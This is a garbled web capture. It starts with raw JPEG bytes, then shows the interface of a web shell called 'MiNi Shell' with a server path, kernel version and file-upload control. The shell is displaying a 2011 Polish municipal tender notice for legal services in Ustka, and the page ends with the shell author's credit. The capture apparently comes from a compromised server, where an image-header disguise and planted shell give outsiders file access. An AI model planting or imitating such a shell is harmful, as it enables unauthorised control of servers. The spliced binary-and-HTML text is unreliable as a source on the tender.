JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111117/299835-N-2011.html

<p class="kh_header"><b>Ustka: Świadczenie usług doradztwa i obsługi prawnej na rzecz Gminy Miasto Ustka</b><br>
<b>Numer ogłoszenia: 299835 - 2011; data zamieszczenia: 17.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Ustka , ul. ks. kard. Stefana Wyszyńskiego 3, 76-270 Ustka, woj. pomorskie, tel. 059 8154300, faks 059 8152900.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ustka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług doradztwa i obsługi prawnej na rzecz Gminy Miasto Ustka.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usług doradztwa i obsługi prawnej na rzecz Gminy Miasto Ustka w 2012 roku.
2.	Przedmiot zamówienia został podzielony na następujące zadania:
Zadanie 1 - 	Kompleksowa obsługa prawna Gminy Miasta Ustka, Urzędu Miasta Ustka oraz jednostek organizacyjnych Gminy Miasta Ustka z wyłączeniem OSiR,
Zadanie 2 - 	Konsultacje prawne w Punkcie Konsultacyjno-Informacyjnym dla Ofiar Przemocy VITA ACTIVA.
3.	Zasady realizacji usług obsługi prawnej - zadania 1:
1)	w ramach realizacji przedmiotu umowy Wykonawca na rzecz Gminy Miasto Ustka, Urzędu Miasta Ustka oraz jednostek organizacyjnych Gminy Miasto Ustka określonych w pkt. 7) (z wyłączeniem OSiR) zobowiązany jest do zabezpieczenia kompleksowej obsługi prawnej, w tym w szczególności do:
a)	czynnego udziału w sporządzaniu projektów aktów prawnych, zarówno powszechnie obowiązujących, jak i wewnętrznych oraz indywidualnych,
b)	udzielania porad prawnych i konsultacji prawnych,
c)	udzielanie wyjaśnień w zakresie stosowania prawa,
d)	wydawania ustnych i pisemnych opinii prawnych,
e)	opiniowania projektów umów i porozumień oraz pism cywilnoprawnych oraz urzędowych,
f)	opiniowanie dokumentacji udzielania zamówień publicznych,
g)	sporządzania projektów umów cywilnoprawnych,
h)	uczestnictwo w prowadzonych przez Zamawiającego rokowaniach i negocjacjach oraz innych czynności o podobnych charakterze,
i)	świadczenie pomocy prawnej w trakcie sesji Rady Miasta, a w razie konieczności również podczas posiedzeń komisji oraz narad Burmistrza Miasta, Z-cy Burmistrza Miasta, Sekretarza, Skarbnika lub innych osób funkcyjnych,
j)	opiniowania treści korespondencji Urzędu z organami administracji publicznej, sądami i innymi instytucjami oraz osobami prawnymi i fizycznymi,
k)	wykonywania nadzoru prawnego nad egzekucją należności Zamawiającego oraz współdziałanie w podejmowaniu czynności w zakresie postępowania egzekucyjnego,
l)	udziału w opracowywaniu i uzgadnianiu projektów uchwał Rady Miasta, zarządzeń, poleceń i postanowień Burmistrza Miasta oraz innych regulacji wewnętrznych, opiniowanie ich pod względem redakcyjnym i formalno-prawnym;
2)	przedmiot zadania nie obejmuje świadczenia usług zastępstwa procesowego przed sądami, trybunałami lub innymi organami orzekającymi oraz usług doradztwa prawnego w zakresie zastępstwa procesowego;
3)	Wykonawca będzie świadczył usługę obsługi prawnej w siedzibie Zamawiającego mieszczącej się w Ustce przy ul. Ks. Kard. S. Wyszyńskiego 3;
4)	w wyjątkowych sytuacjach, na wniosek Zamawiającego, Wykonawca zobowiązany będzie do świadczenia usług stanowiących przedmiot zamówienia poza wyznaczonym miejscem - tzn. w siedzibie Wykonawcy bądź w innych miejscach na terenie województwa pomorskiego;
5)	Wykonawca zapewni kontakt telefoniczny bądź e-mailowy z każdym członkiem zespołu prawnego;
6)	pomoc prawna będzie świadczona w systemie 4 dyżurów w tygodniu (w łącznym wymiarze 28 godzin tygodniowo):
-	w poniedziałek w godz. od 8:00 do 16:00, 
-	w środę w godz. od 8:00 do 15:30, 
-	w czwartek w godz. od 8:00 do 15:30, 
-	w piątek w godz. od 8:00 do 13:00, 
a nadto w wyjątkowych sytuacjach - w systemie doraźnych spotkań według zapotrzebowania Zamawiającego, w wymiarze nie większym niż 2 h miesięcznie w 3-miesięcznym okresie rozliczeniowym;
7)	jednostki organizacyjne Gminy Miasta Ustka wg stanu na dzień wszczęcia postępowania stanowią:
a)	Szkoła Podstawowa Nr 1 w Ustce,
b)	Szkoła Podstawowa Nr 2 w Ustce,
c)	Przedszkole Miejskie Nr 1 w Ustce,
d)	Przedszkole Miejskie Nr 2 w Ustce,
e)	Przedszkole Miejskie Nr 3 w Ustce,
f)	Żłobek Miejski,
g)	Miejski Ośrodek Pomocy Społecznej w Ustce,
h)	Dom Kultury w Ustce.
4.	Zasady świadczenia usług  konsultacji prawnych - zadanie 2:
1)	w ramach realizacji zadania Wykonawca zobowiązany jest do świadczenia kompleksowych usług konsultacji prawnych na rzecz skierowanych do punktu ofiar przemocy lub innych osób, w tym w szczególności do:
a)	udzielania kompleksowej i wszechstronnej pomocy prawnej, w tym sporządzania pism procesowych,
b)	pisemnego odnotowywania podjętych czynności, a także kontynuowania pomocy w zgłaszanych indywidualnie sprawach, za bieg których jest odpowiedzialny,
c)	świadczenia dalszej koniecznej pomocy prawnej, w szczególności udzielania  porad i konsultacji prawnych;
2)	przedmiot zadania nie obejmuje świadczenia usług zastępstwa procesowego przed sądami, trybunałami lub innymi organami orzekającymi oraz usług doradztwa prawnego w zakresie zastępstwa procesowego;
3)	Wykonawca będzie świadczył usługę konsultacji prawnych w siedzibie Zamawiającego - w Ustce przy ul. Ks. Kard. S. Wyszyńskiego 3;
4)	konsultacje prawne realizowane będą w każdą środę tygodnia w godzinach 16:00-18:00, w wymiarze 2 godzin tygodniowo;
5)	Wykonawca świadczył będzie pomoc prawną w ramach dyżurów o których mowa w pkt. 4), a ponadto w siedzibie Wykonawcy, kontakt telefoniczny bądź e-mailowy, w każdym czasie w nagłych przypadkach - w razie potrzeb Zamawiającego.
5.	Wykonawca świadczył będzie obsługę prawną oraz udzielał konsultacji prawnych ze starannością wynikającą z wiedzy prawniczej oraz zasad etyki radcy prawnego.
6.	Wykonawca będzie świadczył usługę poprzez wyznaczone osoby wchodzące w skład zespołu prawnego, o którym mowa w pkt. III.3.4) ogłoszenia (7.1.3. SIWZ), składającego się maksymalnie z 3 osób, przy czym osoby o których mowa w pkt. III.3.4) ppkt. 1) i 2) ogłoszenia ( 7.1.3.1. i 7.1.3.2. SIWZ) świadczyć będą usługi w zakresie doradztwa i obsługi prawnej Gminy Miasta Ustka, Urzędu Miasta Ustka oraz jednostek organizacyjnych Gminy Miasta Ustka z wyłączeniem OSiR, w łącznym wymiarze nie mniejszym niż 23 h tygodniowo.
Wykonawca zapewni koordynację obsługi prawnej i konsultacji przez Koordynatora zespołu. Dla prawidłowego wykonania zamówienia Koordynator będzie stale dostępny dla Zamawiającego poprzez kontakt za pomocą elektronicznych środków łączności oraz poprzez kontakt osobisty i osobistą bytność w siedzibie Zamawiającego w wymiarze minimum 7 h tygodniowo. Ponadto Koordynator zobowiązany będzie do obsługi sesji Rady Miasta, jedynie w wyjątkowych sytuacjach obsługę pełnił będzie inny członek zespołu prawnego.
7.	Wykonawca jest obowiązany zachować w tajemnicy wszystko, o czym dowiedział się w związku z realizacją przedmiotu zamówienia.
8.	Zamawiający zapewni Wykonawcy pomieszczenie, w którym winna odbywać się realizacja usług, wyposażone w meble biurowe, telefon, urządzenie drukujące oraz dostęp do Internetu. Sprzęt komputerowy oraz wszelkie pomoce dydaktyczne, w tym dostęp do internetowych baz wiedzy i pomocy prawnej, niezbędny do realizacji przedmiotu zamówienia Wykonawca zabezpieczy we własnym zakresie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.11.10.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony jeżeli Wykonawca wykonał należycie (a w przypadku świadczeń okresowych lub ciągłych wykonuje) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną usługę polegającą na stałej obsłudze prawnej jednostki samorządu terytorialnego, trwającej nieprzerwanie co najmniej 18 miesięcy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek  zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował (i wyznaczy do realizacji zamówienia) celem realizacji przedmiotu zamówienia co najmniej 2-osobowym  zespołem prawnym, którego wszyscy członkowie posiadają wpis na listę radców prawnych lub adwokatów, a ponadto dwie z nich spełniają następujące wymagania:
1)	koordynator zespołu - osoba legitymującej się minimum 5-letnim doświadczeniem zawodowym jako radca prawny lub adwokat w świadczeniu usług doradztwa prawnego, w tym minimum 3 lata doświadczenia w zakresie obsługi prawnej jednostki samorządu terytorialnego,
2)	członek zespołu - osoba legitymująca się minimum 3-letnim doświadczeniem zawodowym jako radca prawny lub adwokat w świadczeniu usług doradztwa prawnego, w tym minimum 2 lata doświadczenia w zakresie obsługi prawnej jednostki samorządu terytorialnego;
Zespół winien się składać maksymalnie z 3 osób</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej z tytułu prowadzonej działalności związanej z przedmiotem zamówienia o wartości nie mniejszej niż 1 000 000,00 zł (jeden milion złotych)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku działania Wykonawcy przez pełnomocnika, należy dołączyć do oferty pełnomocnictwo w oryginale bądź jego kopię poświadczoną notarialnie, z którego treści będzie wynikać zakres udzielonego umocowania.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Doświadczenie w obsłudze prawnej jednostek samorządu terytorialnego - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ustawy PZP przewiduje możliwość wprowadzenia istotnych zmian do treści zawartej umowy w następującym zakresie:
1)	osoby wchodzącej w skład zespołu prawnego, przy czym nowo wskazana przez Wykonawcę osoba musi spełniać wymagania określone w pkt. III.3.4) ogłoszenia (7.1.3.) SIWZ i uzyskać akceptację Zamawiającego;
2)	dni i godzin realizacji dyżurów przez Wykonawcę na uzasadniony potrzebami Zamawiającego wniosek, przy czym łączny tygodniowy wymiar godzin w każdym z zadań nie ulegnie zmianie;
3)	ilości obsługiwanych jednostek organizacyjnych Gminy Miasta Ustka na skutek zmian organizacyjnych, przy czym cena jest stała i nie ulega zmianie.
W żadnym wypadku postanowień punktu nie należy interpretować jako udzielenie dowolnej ze stron roszczenia do żądania zmiany umowy, a jedynie możliwość dokonania zmiany umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ustka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Ustka, 76-270 Ustka, ul. Ks. Kard. S. Wyszyńskiego 3, pokój nr 307.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.11.2011 godzina 10:00, miejsce: Urząd Miasta Ustka, 76-270 Ustka, ul. Ks. Kard. S. Wyszyńskiego 3, Biuro Obslugi Interesantów (pokój nr 104).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com